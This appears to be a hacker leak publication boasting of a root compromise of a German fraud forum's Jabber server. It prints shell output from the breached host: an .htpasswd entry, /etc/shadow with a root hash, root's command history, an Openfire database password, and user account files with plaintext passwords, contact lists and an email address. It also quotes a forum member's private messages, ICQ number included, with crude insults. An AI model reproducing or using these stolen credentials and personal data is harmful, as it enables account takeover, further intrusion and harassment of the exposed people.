-rw-r--r--  1 swissfaking swissfaking 58666 Jan  3 22:49 thread.php
-rw-r--r--  1 swissfaking swissfaking  8300 Jan  3 22:49 threadfields_admin.php
-rw-r--r--  1 swissfaking swissfaking 95176 Jan  3 22:48 user.php
-rw-r--r--  1 swissfaking swissfaking 56136 Jan  3 22:48 usergroup.php
-rw-r--r--  1 swissfaking swissfaking  7272 Jan  3 22:48 usertitle.php
-rw-r--r--  1 swissfaking swissfaking 75581 Jan  3 22:48 usertools.php
-rw-r--r--  1 swissfaking swissfaking 18753 Jan  3 22:48 verify.php

# cat .htpasswd 
Fickmaus:9Zistd9IicJdY

# cd ../jabber && ls -la
total 684
drwxr-xr-x  2 swissfaking swissfaking   4096 Oct 10 19:11 .
drwxr-xr-x 23 swissfaking swissfaking   4096 Jan  4 22:30 ..
-rw-r--r--  1 swissfaking swissfaking   7948 Oct 10 18:54 AC_OETags.js
-rw-r--r--  1 swissfaking swissfaking 629979 Oct 10 18:56 SparkWeb.swf
-rw-r--r--  1 swissfaking swissfaking   4286 Oct 10 19:10 favicon.gif
-rw-r--r--  1 swissfaking swissfaking   3638 Oct 10 18:54 favicon.ico
-rw-r--r--  1 swissfaking swissfaking   1272 Oct 10 18:54 history.htm
-rw-r--r--  1 swissfaking swissfaking   1292 Oct 10 18:54 history.js
-rw-r--r--  1 swissfaking swissfaking   2656 Oct 10 18:54 history.swf
-rw-r--r--  1 swissfaking swissfaking  15260 Oct 10 19:11 jabber.html
-rw-r--r--  1 swissfaking swissfaking   2518 Oct 10 18:55 osxmousewheel.js
-rw-r--r--  1 swissfaking swissfaking    657 Oct 10 18:55 playerProductInstall.swf


While looking through the forums we came across someone special...
________________________________________________________________________
From fred777 to Fickmaus; Subject: Mod?

Hi Ficki, ich freu mich, dass swiss wieder online ist und wollte fragen
ob ihr Unterstützung benötigt, bzw. ich würde gerne meine Hilfe anbieten..

Designen, moderieren etc.
Als Moderator würde ich wenn dann gerne die Sections:
Coding und Hacking/Cracking moderieren. Vielleicht braucht ihr aber auch
gar keine, ich dachte nur für einen guten Start ist das nicht schlecht.

Selbstverständlich werde ich auch noch einiges posten

Falls ihr mich nicht kennt, schaut mal auf
fred777.5x.to, free-hack, back2hack etc. vorbei ;)

Danke
________________________________________________________________________
From fred777 to SzeneCrasher; Subject: Hi Crasher

Jo da die ersten Mods eingestellt werden wollte ich mal fragen bezüglich
der Hacking/Coding Section.
Ich würde die gerne moderieren und euch helfen.
Das ich kein Mist mache solltest du wissen, bin schon lange im Netz
unterwegs, FH,Back2hack etc..

Solltest du Fragen haben: ICQ 390271540

Vielleicht wird das ja was, danke schonmal
________________________________________________________________________
From fred777 to erdnuss; Subject: Mod?

Ja, da nun ja auch Sections geändert worden sind und es voller wird,
wollte ich nun bei den Admins fragen wie es so ist mit den Moderatoren
in der Security/Hacking Sections.
Habe auch schon letztens Ficki gefragt, der meinte abwarten...

Es müssten z.B. aktuell einige Beiträge verschoben werden. Ich würde
gerne Moderator in dieser Section werden, darum die Frage.
Kennen könnte man mich von Back2hack und Freehack ;)
________________________________________________________________________
From fred777 to SzeneCrasher; Subject: Frage

Ich wollte mich nochmal erkundigen, wie es mit den Moderatoren aussieht,
Swiss ist ja nun voller und größer geworden. Ich kann auch nochmal eine
komplette Bewerbung abschicken wenn ihr welche sucht.
________________________________________________________________________
From fred777 to SzeneCrasher; Subject: Aussichten

Ja ich wollte mal fragen, wie es so steht, bezüglich der
Moderatorenanfrage und was die anderem Teamies gesagt haben..

Gruß _fred_
________________________________________________________________________


FUCK. Are you serious? We knew you're lame. We knew you're  dying  for
fame and we even knew you suck cock but we were absolutely  not  aware
of the extent this has come to.  Are  you  really  that  desperate  to
moderate a fucking preschool that you start begging for it  only  days
after your registration? Damnit fred, you're pretty rundown.


 ____________________________________________________________________
|                         __          __                             |
|     .-----.--.--.-----.|  |_.-----.|  |--.-----.--.--.             |
|     |  _  |  |  |  _  ||   _|  -__||  _  |  _  |_   _|             |
|     |__   |_____|_____||____|_____||_____|_____|__.__|             |
|________|__|________________________________________________________|
|                                                                    |
|             From fred777 to Fickmaus; Subject: Jabber              |
|    Ja ich hätte gerne einen Account, habe noch keinen.             |
|    Name: fred777                                                   |
|____________________________________________________________________|

Right on cue, chap!
Not only is the board full of criminal kids, but they also  provide  a
jabber server for their users. While at it, we decided to tap  in  and
see what they're doing there,  we  also  got  some  loggin  going  and
prepared a nice collection of their messages as well as a full  backup
for you.


# uname -a
Linux jabbersw 2.6.18-194.3.1.el5.028stab069.6 #1 SMP Wed May 26 18:31:05 MSD 2010 i686 GNU/Linux

# id
uid=0(root) gid=0(root)

# cat /etc/passwd /etc/shadow
root:x:0:0:root:/root:/bin/bash
daemon:x:1:1:daemon:/usr/sbin:/bin/sh
bin:x:2:2:bin:/bin:/bin/sh
sys:x:3:3:sys:/dev:/bin/sh
sync:x:4:65534:sync:/bin:/bin/sync
games:x:5:60:games:/usr/games:/bin/sh
man:x:6:12:man:/var/cache/man:/bin/sh
lp:x:7:7:lp:/var/spool/lpd:/bin/sh
mail:x:8:8:mail:/var/mail:/bin/sh
news:x:9:9:news:/var/spool/news:/bin/sh
uucp:x:10:10:uucp:/var/spool/uucp:/bin/sh
proxy:x:13:13:proxy:/bin:/bin/sh
www-data:x:33:33:www-data:/var/www:/bin/sh
backup:x:34:34:backup:/var/backups:/bin/sh
list:x:38:38:Mailing List Manager:/var/list:/bin/sh
irc:x:39:39:ircd:/var/run/ircd:/bin/sh
gnats:x:41:41:Gnats Bug-Reporting System (admin):/var/lib/gnats:/bin/sh
nobody:x:65534:65534:nobody:/nonexistent:/bin/sh
libuuid:x:100:101::/var/lib/libuuid:/bin/sh
bind:x:101:104::/var/cache/bind:/bin/false
fetchmail:x:102:65534::/var/lib/fetchmail:/bin/false
sshd:x:103:65534::/var/run/sshd:/usr/sbin/nologin
stunnel4:x:104:106::/var/run/stunnel4:/bin/false
smmta:x:105:107:Mail Transfer Agent,,,:/var/lib/sendmail:/bin/false
smmsp:x:106:108:Mail Submission Program,,,:/var/lib/sendmail:/bin/false
jabber:x:107:65534::/var/run/jabber:/bin/false
messagebus:x:108:109::/var/run/dbus:/bin/false
avahi:x:109:110:Avahi mDNS daemon,,,:/var/run/avahi-daemon:/bin/false
postgres:x:110:112:PostgreSQL administrator,,,:/var/lib/postgresql:/bin/bash
identd:x:111:65534::/var/run/identd:/bin/false
openfire:x:112:113:Openfire XMPP server,,,:/var/lib/openfire:/bin/false
root:$1$58.RHhjn$9z8MH2daUFLKAJclEq7A8.:14818:0:99999:7:::
daemon:*:14725:0:99999:7:::
bin:*:14725:0:99999:7:::
sys:*:14725:0:99999:7:::
sync:*:14725:0:99999:7:::
games:*:14725:0:99999:7:::
man:*:14725:0:99999:7:::
lp:*:14725:0:99999:7:::
mail:*:14725:0:99999:7:::
news:*:14725:0:99999:7:::
uucp:*:14725:0:99999:7:::
proxy:*:14725:0:99999:7:::
www-data:*:14725:0:99999:7:::
backup:*:14725:0:99999:7:::
list:*:14725:0:99999:7:::
irc:*:14725:0:99999:7:::
gnats:*:14725:0:99999:7:::
nobody:*:14725:0:99999:7:::
libuuid:!:14725:0:99999:7:::
bind:*:14725:0:99999:7:::
fetchmail:*:14725:0:99999:7:::
sshd:*:14725:0:99999:7:::
stunnel4:!:14725:0:99999:7:::
smmta:*:14725:0:99999:7:::
smmsp:*:14725:0:99999:7:::
jabber:*:14817:0:99999:7:::
messagebus:*:14829:0:99999:7:::
avahi:*:14829:0:99999:7:::
postgres:*:14829:0:99999:7:::
identd:*:14829:0:99999:7:::
openfire:*:14829:0:99999:7:::

# cd /root && ls -la
total 36
drwxr-xr-x  3 root root 4096 Jan  3 01:45 .
drwxr-xr-x 20 root root 4096 Dec 30 13:30 ..
-rw-------  1 root root 5215 Sep 27 21:42 .bash_history
-rw-r--r--  1 root root  412 Dec 16  2004 .bashrc
-rw-r--r--  1 root root  140 Nov 19  2007 .profile
drwx------  2 root root 4096 Jan  3 00:35 .ssh
-rw-------  1 root root 6186 Jan  3 01:45 .viminfo

# cat .bash_history 
cd etc
ls -l
cd jabber
ls -l
vi  jabber.xml
ls -l
vi jabber.cfg
cd ..
ls -l
cd ..
ls -l
cd jabberd/jabber-1.4.2a
ls -l
cd var
cd run
ls -l
cd jabber
ls -l
ls -l
cd ..
ls -l
cd etc
cd jabber
ls -l
Wget http://ports.internal.vlink.ru/distfiles/mu-conference-0.6.0.tar.gz
wget http://ports.internal.vlink.ru/distfiles/mu-conference-0.6.0.tar.gz
ls -l
gzip -d mu-conference-0.6.0.tar.gz
ls -l
tar -xvf mu-conference-0.6.0.tar
ls -l
cd mu-conference-0.6.0
ls -l
make
Makefile
ls -l
ps aux
cd src
ls -l
cd ..
ls -l
cd scripts
ls -l
cd ..
ls -l
cd ./
ls -l
cd ..
ls -l
vi jabber.xml
cd mu-conference-0.6.0
ls -l
make
cd src
ls -l
make
cd ..
cd ..
cd ..
cd ..
ls -l
cd /etc/jabber
ls -l
del mu-conference-0.6.0.tar
rmdir  mu-conference-0.6.0
 mu-conference-0.6.0
rmdir -p  mu-conference-0.6.0
rmdir --ignore-fail-on-non-empty mu-conference-0.6.0
ls -l
rmdir --help
rmdir --ignore mu-conference-0.6.0
ls -l
rmdir -i mu-conference-0.6.0
rm mu-conference-0.6.0.tar
ls -l
rm mu-conference-0.6.0
rm -r mu-conference-0.6.0
ls -l
cd ..
cd ..
cd ..
ls -l
wget http://download.gna.org/mu-conference/mu-conference_0.8.tar.gz
ls -l
gzip -d mu-conference_0.8.tar.gz
ls -l
tar -xvf mu-conference_0.8.tar
ls -l
cd mu-conference_0.8
ls -l
make
ls -l
cd scr
ls -l
cd src
ls -l
make
ls -l
cd ..
cd ..
ls -l
rm mu-conference_0.8.tar
rm -r mu-conference_0.8
ls -l
wget http://download.jabberd.org/jabberd14/jabberd-1.4.4.tar.gz
gzip -d jabberd-1.4.4.tar.gz
tar -xvf gzip -d jabberd-1.4.4.tar
ls -l
tar -xvf jabberd-1.4.4.tar
ls -l
cd jabberd-1.4.4
ls -l
./configure
make
ls -l
cd ..
ls -l
rm jabberd-1.4.4.tar
rm -r jabberd-1.4.4
ls -l
cd etc
cd jabber
ls -l
vi jabber.d
cd jabber.d
ls -l
cd ..
cd ..
cd ..
ls -l
cd var
cd run
ls -l
cd jabber
ls -l
wget http://ftp.riken.go.jp/pub/FreeBSD/distfiles/jabber/jud-0.4.tar.gz
ls -l
gzip -d jud-0.4.tar.gz
tar -xvf jud-0.4.tar
ls -l
cd jud-0.4
ls -l
make
cd ..
ls -l
rm jud-0.4.tar
rm -r jud-0.4
ls -l
ls -l
cd ..
ls -l
cd var
cd run
cd jabber
ls -l
ps aux
cd ..
cd ..
ls -l
cd ..
ls -l
cd etc
ls -l
cd jabber
ls -l
vi jabber-muc.xml
ps aux
cd ..
cd ..
cd var
cd run
cd jabber
ls -l
 su jabber
ls -l
ps aux
cd ..
cd ..
ls -l
cd etc
cd ..
ls -l
cd etc
cd jabber
ls -l
vi jabber.xml
cd ..
ls -l
cd jabber
ls -l
cd ..
cd init.d
ls -l
cd jabber
cd ..
ls -l
cd ..
cd usr
cd lib
ls -l
cd jabber
ls -l
cd mu-conference
ls -l
cd ..
cd ..
cd..
cd ..
cd ..
cd etc
cd jabber
ls -l
vi jabber.xml
vi jabber-muc.xml
jabber-muc
cd ..
ls -l
cd default
ls -l
jabber-muc
cd jabber-muc
jabber-muc
cd jabber-muc
exec jabber-muc
cd ..
cd ..
cd var
cd spool
ls -l
cd ..
cd ..
ls -l
cd etc
cd jabber
ls -l
vi jabber-muc.xml
ps aux
cd ..
ls -l
cd etc
cd jabber
ls -l
vi jabber-muc.xml
vi jabber-jud.xml
vi jabber.xml
cd ..
cd etc
cd jabber
ls -l
vi jabber.xml
ps aux
cd ..
cd ..
cd usr
ls -l
cd lib
ls -l
cd jabber
ls -l
cd mu-conference
ls -l
cd ..
cd ..
cd ..
cd ..
cd etc
ls -l
cd jabber
ls -l
vi 
vi jabber.xml
ps aux
kill 26124
ls -l
ps aux
cd ..
cd ..
cd usr
cd sbin
ls -l
jabberd -h jabber-swissfaking.net
cd ..
cd ..
cd etc
ls -l
cd jabber
ls -l
vi jabber.xml
cd ..
cd ..
cd usr
cd sbin
jabberd -h jabber-swissfaking.net
ps aux
netstat -tlun
cd ..
cd cd var
ls -l
cd var
cd run
cd jabber
ls -l
cd ..
cd ..
ls -l
cd ..
ls -l
cd usr
cd sbin
ls -l
jabber-muc
jabberd -much jabber-swissfaking.net
cd ..
cd etc
cd jabber
ls -l
vi jabber.xml
vi jabber.cfg
cd..
cd ..
cd ..
cd var
cd lib
cd jabber
ls -l
cd ..
cd ..
cd var
cd var
cd ..
cd var
cd run
cd jabber
ls -l
ps aux
kill 3184
jabberd -h jabber-swissfaking.net
cd ..
ls-l
ls -l
cd etc
cd jabber
ls -l
vi jabber-muc.xml
vi jabber-jud.xml
cd ..
default
cd default
vi jabber-muc
cd ..
cd jabber
ls -l
vi jabber.xml
netstat -tlun
cd ..
cd ..
cd var
cd run
cd jabber
ps aux
kill 18354
jabberd -h jabber-swissfaking.net
cd..
cd ..
cd etc
cd jabber
ls -l
cd jabber.d
ls -l
jabber-jud
jabber-jud -h
cd jabber-jud
jabber-jud 
jabber-jud -h jabber-swissfaking.net
cd ..
cd .
cd ..
cd ..
cd var
cd spool
ls -l
cd ..
cd ..
ps aux
cd /usr/lib/jvm/ja
cd usr
cd ..
cd usr
cd lib
cd ...
cd ..
cd ..
cd etc
ls -l
cd init.d
ls -l
openfire restart
openfire restart
cd openfir
openfire stop
sudo /etc/init.d/openfire restart
ls -l
cd ..
cd /usr/share/openfire 
ls -l
cd lib
ls -l
ps aux
cd /usr/sbin/jabberd
cd /usr/sbin/jabberd
cd /usr/sbin/
ls -l
ps aux
kill 7313
ps aux
sudo /etc/init.d/openfire restart
cd ..
ps aux
kill 13651
sudo /etc/init.d/openfire restart
ps aux
ps aux
ps aux
ps aux
ps aux
ps aux
sudo /etc/init.d/openfire start
ps aux
cd ..
ls -l
ps aux
sudo /etc/init.d/openfire restart
ps aux
ps aux
ps aux
kill 13754
ps aux
ps aux
sudo /etc/init.d/openfire restart
ps aux
kill 26588
sudo /etc/init.d/openfire restart
cd ..
ls -
ls -l
cd etc
ls -l
cd jabber
ls -l
del
rm jabber.xml
rm jabber.d
rm jabber.cfg
rm jabber-muc.xml
rm jabber-jud.xml
ls -l
cd jabber.d
ls -l
rm jabber-jud
rm jabber-muc
ls -l
cd ..
ls -l
rmdir jabber.d
ls -l
cd ..
ls -l
cd ..
cd var
cd run
ls -l
rm jabber
cd jabber
ls -l
cd ..
ls -l
cd ..
ls -l
cd 
ls -l
cd ..
ls -l
ps aux
cd..
cd ..
ls -l
ps aux
sudo /etc/init.d/openfire restart
cd ..
ps-aux
ps aux
sudo /etc/init.d/openfire restart
ps aux
cd ..
ps aux
sudo /etc/init.d/openfire restart
cd ..
ps aux
sudo /etc/init.d/openfire restart
sensor

# ps aux
USER       PID %CPU %MEM    VSZ   RSS TTY      STAT START   TIME COMMAND
root         1  0.0  0.1   1980   688 ?        Ss    2010   0:05 init [2]      
openfire  1703  0.0 25.0 342352 131124 ?       Sl   Jan03   4:30 /usr/lib/jvm/java-6-sun/bin/java -server -DopenfireHome=/usr/share/openfire -Dopenfire.lib.dir=/usr/share/openfire/lib -classpath /usr/share/openfire/lib/startup.jar -jar /us
root      3392  0.0  0.1   1692   616 ?        Ss    2010   0:00 /sbin/syslogd
108       3399  0.0  0.1   2480   860 ?        Ss    2010   0:00 /usr/bin/dbus-daemon --system
avahi     3410  0.0  0.2   2876  1432 ?        Ss    2010   0:00 avahi-daemon: running [jabbersw.local]
avahi     3411  0.0  0.0   2744   452 ?        Ss    2010   0:00 avahi-daemon: chroot helper
root      3417  0.0  0.1   5272  1032 ?        Ss    2010   0:00 /usr/sbin/sshd
www-data  3632  0.0  1.1  38240  6232 ?        S    Jan02   0:00 /usr/sbin/apache2 -k start
postgres  3750  0.0  0.9  40668  4960 ?        S     2010   0:01 /usr/lib/postgresql/8.3/bin/postgres -D /var/lib/postgresql/8.3/main -c config_file=/etc/postgresql/8.3/main/postgresql.conf
postgres  5193  0.0  1.2  40668  6540 ?        Ss    2010   0:04 postgres: writer process                                                                                                    
postgres  5194  0.0  0.2  40668  1288 ?        Ss    2010   0:02 postgres: wal writer process                                                                                                
postgres  5195  0.0  0.2  40808  1424 ?        Ss    2010   0:01 postgres: autovacuum launcher process                                                                                       
postgres  5196  0.0  0.2  11988  1192 ?        Ss    2010   0:05 postgres: stats collector process                                                                                           
root      5230  0.0  0.1 108572   940 ?        Ssl   2010   0:00 /usr/sbin/nscd
root      5262  0.0  0.1   2912   820 ?        Ss    2010   0:00 /usr/sbin/xinetd -pidfile /var/run/xinetd.pid -stayalive -inetd_compat -inetd_ipv6
root      5279  0.0  0.1   2036   688 ?        Ss    2010   0:00 /usr/sbin/cron
root      5430  0.0  2.3  37740 12556 ?        Ss    2010   0:00 /usr/sbin/apache2 -k start
postgres  7792  0.0  1.2  41992  6744 ?        Ss   00:53   0:01 postgres: openfire openfire 127.0.0.1(43823) idle                                                                           
postgres  7801  0.0  1.1  41916  6044 ?        Ss   00:53   0:01 postgres: openfire openfire 127.0.0.1(43824) idle                                                                           
postgres  7802  0.0  1.2  41980  6300 ?        Ss   00:53   0:01 postgres: openfire openfire 127.0.0.1(43825) idle                                                                           
postgres  7803  0.0  1.2  41976  6296 ?        Ss   00:53   0:01 postgres: openfire openfire 127.0.0.1(43826) idle                                                                           
postgres 13420  0.0  1.2  41988  6720 ?        Ss   00:53   0:01 postgres: openfire openfire 127.0.0.1(43907) idle                                                                           
www-data 17911  0.0  1.1  38236  6220 ?        S    Jan03   0:00 /usr/sbin/apache2 -k start
root     22036  0.0  0.1   2296   776 pts/0    R+   07:10   0:00 ps aux
www-data 26577  0.0  1.1  38240  6236 ?        S    Jan02   0:00 /usr/sbin/apache2 -k start    
root     30105  0.0  0.2   2760  1408 pts/0    Ss   07:04   0:00 -bash

# cd /usr/share/openfire && ls -la
total 20
drwxr-x---   5 openfire openfire 4096 Jan  3 00:49 .
drwxr-xr-x 114 root     root     4096 Aug  9 02:02 ..
lrwxrwxrwx   1 openfire openfire   13 Aug  9 02:02 conf -> /etc/openfire
lrwxrwxrwx   1 openfire openfire   29 Aug  9 02:02 embedded-db -> /var/lib/openfire/embedded-db
drwxr-x---   2 openfire openfire 4096 Aug  9 02:02 lib
lrwxrwxrwx   1 openfire openfire   17 Aug  9 02:02 logs -> /var/log/openfire
drwxr-xr-x   3 openfire openfire 4096 Jan  3 00:49 monitoring
lrwxrwxrwx   1 openfire openfire   25 Aug  9 02:02 plugins -> /var/lib/openfire/plugins
drwxr-x---   3 openfire openfire 4096 Aug  9 02:02 resources

# cd conf && ls -la
total 32
drwxr-x---  3 openfire openfire 4096 Jan  6 16:40 .
drwxr-xr-x 84 root     root     4096 Jan  3 01:45 ..
-rw-r--r--  1 openfire openfire 9403 Jan  6 16:40 available-plugins.xml
-rw-r--r--  1 openfire openfire 1876 Jan  3 00:51 openfire.xml
drwxr-x---  2 openfire openfire 4096 Jan  3 01:31 security
-rw-r--r--  1 openfire openfire   11 Jan  6 16:40 server-update.xml

# cat openfire.xml 
<?xml version="1.0" encoding="UTF-8"?>

<!--
    This file stores bootstrap properties needed by Openfire.
    Property names must be in the format: "prop.name.is.blah=value"
    That will be stored as:
        <prop>
            <name>
                <is>
                    <blah>value</blah>
                </is>
            </name>
        </prop>

    Most properties are stored in the Openfire database. A
    property viewer and editor is included in the admin console.
-->
<!-- root element, all properties must be under this element -->
<jive> 
  <adminConsole> 
    <!-- Disable either port by setting the value to -1 -->  
    <port>9618</port>  
    <securePort>9619</securePort> 
  </adminConsole>  
  <locale>de</locale>  
  <!-- Network settings. By default, Openfire will bind to all network interfaces.
      Alternatively, you can specify a specific network interfaces that the server
      will listen on. For example, 127.0.0.1. This setting is generally only useful
       on multi-homed servers. -->  
  <!--
    <network>
        <interface></interface>
    </network>
    -->  
  <connectionProvider> 
    <className>org.jivesoftware.database.DefaultConnectionProvider</className> 
  </connectionProvider>  
  <database> 
    <defaultProvider> 
      <driver>org.postgresql.Driver</driver>  
      <serverURL>jdbc:postgresql://localhost:5432/openfire</serverURL>  
      <username>openfire</username>  
      <password>pass123</password>  
      <testSQL>select 1</testSQL>  
      <testBeforeUse>true</testBeforeUse>  
      <testAfterUse>true</testAfterUse>  
      <minConnections>5</minConnections>  
      <maxConnections>25</maxConnections>  
      <connectionTimeout>1.0</connectionTimeout> 
    </defaultProvider> 
  </database>  
  <setup>true</setup>  
  <log> 
    <debug> 
      <enabled>false</enabled> 
    </debug> 
  </log> 
</jive>

# cd /var/lib/jabber && ls -la
total 12
drwxr-xr-x  3 jabber adm  4096 Jul 30 21:44 .
drwxr-xr-x 27 root   root 4096 Aug  9 02:02 ..
drwx------  2 root   root 4096 Aug  9 01:34 jabber-swissfaking.net

# cd jabber-swissfaking.net && ls -la
total 192
drwx------ 2 root   root  4096 Aug  9 01:34 .
drwxr-xr-x 3 jabber adm   4096 Jul 30 21:44 ..
-rw------- 1 root   root  1332 Aug  4 16:46 afroman.xml
-rw------- 1 root   root  1387 Aug  8 15:38 babypanda.xml
-rw------- 1 root   root   411 Aug  4 00:03 basics.xml
-rw------- 1 root   root   976 Aug  3 15:31 batonde.xml
-rw------- 1 root   root  9717 Aug  8 21:56 bullddoser.xml
-rw------- 1 root   root   845 Aug  3 17:44 cr4ck.xml
-rw------- 1 root   root  9791 Aug  8 15:16 crankz.xml
-rw------- 1 root   root   391 Aug  3 15:43 cryten.xml
-rw------- 1 root   root   906 Aug  7 19:39 darkfunny.xml
-rw------- 1 root   root   596 Aug  8 17:47 dotsyn.xml
-rw------- 1 root   root   564 Aug  4 16:47 el!t3.xml
-rw------- 1 root   root  2177 Aug  8 23:08 fickmaus.xml
-rw------- 1 root   root   391 Aug  4 23:26 flash.xml
-rw------- 1 root   root  1428 Aug  5 16:17 freakout.xml
-rw------- 1 root   root  1201 Aug  8 23:20 glycerin\40jabber-swissfaking.net.xml
-rw------- 1 root   root   787 Aug  4 14:37 hackthenet.xml
-rw------- 1 root   root  1300 Aug  5 16:17 hans-wurst.xml
-rw------- 1 root   root   390 Aug  5 00:59 holzmen.xml
-rw------- 1 root   root   636 Aug  7 23:25 jamyla\40jabber-swissfaking.net.xml
-rw------- 1 root   root   393 Jul 30 22:10 kappy777.xml
-rw------- 1 root   root   392 Aug  5 15:38 kluless.xml
-rw------- 1 root   root   424 Aug  9 00:55 luigi100.xml
-rw------- 1 root   root   794 Aug  8 15:39 naik.xml
-rw------- 1 root   root   390 Aug  8 16:36 nitex.xml
-rw------- 1 root   root   699 Aug  8 22:16 racketeer.xml
-rw------- 1 root   root   992 Aug  5 16:17 s0xtech.xml
-rw------- 1 root   root   392 Aug  3 23:16 sinned.xml
-rw------- 1 root   root 20723 Aug  5 16:27 st3ffl0r.xml
-rw------- 1 root   root  2325 Aug  8 03:49 syntax\40jabber-swissfaking.net.xml
-rw------- 1 root   root   645 Aug  9 01:12 syntex.xml
-rw------- 1 root   root   724 Aug  8 15:39 theird21.xml
-rw------- 1 root   root  1754 Aug  8 15:38 the|biggie.xml
-rw------- 1 root   root  1764 Aug  9 01:34 trickz.xml
-rw------- 1 root   root   409 Aug  3 20:22 w!cked.xml
-rw------- 1 root   root   396 Aug  8 03:12 w00dka.xml
-rw------- 1 root   root  1324 Aug  5 05:06 weareone.xml
-rw------- 1 root   root   547 Aug  8 18:22 yaboybigt.xml

# for file in *; do echo $file; cat $file; echo -e "\n"; done
afroman.xml
<xdb><password xmlns='jabber:iq:auth' xdbns='jabber:iq:auth'>JGMlms91</password><query xmlns='jabber:iq:register' xdbns='jabber:iq:register'><username>afroman</username><email/><name/><x xmlns='jabber:x:delay' stamp='20100802T19:39:23'>registered</x></query><foo xmlns='jabber:x:offline' xdbns='jabber:x:offline'/><query xmlns='jabber:iq:last' last='1280925819' xdbns='jabber:iq:last'/><query xmlns='jabber:iq:roster' xdbns='jabber:iq:roster'><item jid='fickmaus@jabber-swissfaking.net' name='fickmaus' subscription='both'><group>Friends</group></item><item jid='trickz@jabber-swissfaking.net' name='trickz' subscription='both'><group>Friends</group></item><item jid='weareone@jabber-swissfaking.net' name='weareone' subscription='from'/><item jid='hackthenet@jabber-swissfaking.net' name='hackthenet' subscription='both'><group>Friends</group></item><item jid='babypanda@jabber-swissfaking.net' name='babypanda' subscription='both'><group>Friends</group></item><item jid='freakout@jabber-swissfaking.net' name='freakout' subscription='from'/><item jid='hans-wurst@jabber-swissfaking.net' name='hans-wurst' subscription='from'/><item jid='s0xtech@jabber-swissfaking.net' name='s0xtech' subscription='from'/><item jid='syntax\40jabber-swissfaking.net@jabber-swissfaking.net' subscription='none' subscribe='' hidden=''/></query></xdb>

babypanda.xml
<xdb><password xmlns='jabber:iq:auth' xdbns='jabber:iq:auth'>BTYM8h</password><query xmlns='jabber:iq:register' xdbns='jabber:iq:register'><username>babypanda</username><name>BabyPanda</name><email/><x xmlns='jabber:x:delay' stamp='20100802T21:59:12'>registered</x></query><foo xmlns='jabber:x:offline' xdbns='jabber:x:offline'/><query xmlns='jabber:iq:last' last='1280955772' xdbns='jabber:iq:last'>Disconnected</query><query xmlns='jabber:iq:roster' xdbns='jabber:iq:roster'><item jid='trickz@jabber-swissfaking.net' name='trickz' subscription='to'><group>Friends</group></item><item jid='fickmaus@jabber-swissfaking.net' name='fickmaus' subscription='both'><group>Friends</group></item><item jid='afroman@jabber-swissfaking.net' name='afroman' subscription='both'><group>Friends</group></item><item jid='hackthenet@jabber-swissfaking.net' name='hackthenet' subscription='both'><group>Friends</group></item><item jid='s0xtech@jabber-swissfaking.net' subscription='from'/><item jid='the|biggie@jabber-swissfaking.net' subscription='from'/><item jid='hans-wurst@jabber-swissfaking.net' subscription='from'/><item jid='freakout@jabber-swissfaking.net' subscription='from'/><item jid='syntax\40jabber-swissfaking.net@jabber-swissfaking.net' subscription='from'/><item jid='glycerin\40jabber-swissfaking.net@jabber-swissfaking.net' subscription='none' subscribe='' hidden=''/></query></xdb>

basics.xml
<xdb><password xmlns='jabber:iq:auth' xdbns='jabber:iq:auth'>nicki123!</password><query xmlns='jabber:iq:register' xdbns='jabber:iq:register'><username>basics</username><email/><name/><x xmlns='jabber:x:delay' stamp='20100803T11:03:07'>registered</x></query><foo xmlns='jabber:x:offline' xdbns='jabber:x:offline'/><query xmlns='jabber:iq:last' last='1280865831' xdbns='jabber:iq:last'>Disconnected</query></xdb>

batonde.xml
<xdb><password xmlns='jabber:iq:auth' xdbns='jabber:iq:auth'>1asdfghjkl</password><query xmlns='jabber:iq:register' xdbns='jabber:iq:register'><username>batonde</username><x xmlns='jabber:x:delay' stamp='20100802T19:39:30'>registered</x></query><roster xmlns='roster:delimiter' j_private_flag='1' xdbns='roster:delimiter'>\</roster><foo xdbns='jabber:xdb:nslist' xmlns='jabber:xdb:nslist'><ns type='private'>roster:delimiter</ns></foo><query xmlns='jabber:iq:last' last='1280835059' xdbns='jabber:iq:last'>Replaced by new connection</query><vCard xmlns='vcard-temp' xdbns='vcard-temp'><FN/><N><GIVEN/><MIDDLE/><FAMILY/></N><NICKNAME>batonde</NICKNAME><BDAY/><GENDER/><ADR><HOME/><STREET/><EXTADR/><EXTADD/><LOCALITY/><REGION/><PCODE/><CTRY/><COUNTRY/></ADR><ADR><WORK/><STREET/><EXTADR/><EXTADD/><LOCALITY/><REGION/><PCODE/><CTRY/><COUNTRY/></ADR><ORG><ORGNAME/><ORGUNIT/></ORG><TITLE/><ROLE/><URL/><DESC/></vCard><foo xmlns='jabber:x:offline' xdbns='jabber:x:offline'/></xdb>

bullddoser.xml
<xdb><password xmlns='jabber:iq:auth' xdbns='jabber:iq:auth'>xdfhrrt568KZKF6)</password><query xmlns='jabber:iq:register' xdbns='jabber:iq:register'><username>bullddoser</username><name>BullDDOSer</name><email>Bullddoser@pakistans.com</email><x xmlns='jabber:x:delay' stamp='20100730T20:37:19'>registered</x></query><vCard xmlns='vcard-temp' xdbns='vcard-temp'><N><FAMILY/>
<GIVEN/>
<MIDDLE/>
</N>
<ORG><ORGNAME/>
<ORGUNIT/>
</ORG>
<FN/>
<URL/>
<TITLE/>
<NICKNAME/>
<PHOTO><TYPE>image/jpeg</TYPE><BINVAL>iVBORw0KGgoAAAANSUhEUgAAADAAAAAwCAIAAADYYG7QAAAXYUlEQVR42i2XCZRbV5nny6WtpNIuPent70lv35+kKqtUkkpVJan2fXNVucpLed+w4yW2E8dxbLezeI/t2ImBxIRAAuSQEE7oJk2zJXRgzoQtaZrDGeYMA909mSYN4dDQsc3MJ5NzPum85d77fvf7/t93720aGRmpVMq9veVqtVitFnqrpZ7eUrXWVauXq7VSL1xXS319pXq9WKuWa9WuWq1Yr3cODBYHBorwvL+/Alavl8H6+7qGBopjY/nR0a5aX3d3rdQYE0boLff2NKxa7YRmcAvjwCvo3tfX6NvXVxgcLPf3d01PDzdVKpVisdDebufzVkeHlc9n8qszhUKu0JntKGTgtlCwi8XGf0dHBqxQsIpFu1y2S6...AAAElFTkSuQmCC</BINVAL></PHOTO>
<EMAIL><HOME/><INTERNET/><PREF/><USERID/>
</EMAIL>
<TEL><PAGER/><WORK/><NUMBER/>
</TEL>
<TEL><CELL/><WORK/><NUMBER/>
</TEL>
<TEL><VOICE/><WORK/><NUMBER/>
</TEL>
<TEL><FAX/><WORK/><NUMBER/>
</TEL>
<TEL><PAGER/><HOME/><NUMBER/>
</TEL>
<TEL><CELL/><HOME/><NUMBER/>
</TEL>
<TEL><VOICE/><HOME/><NUMBER/>
</TEL>
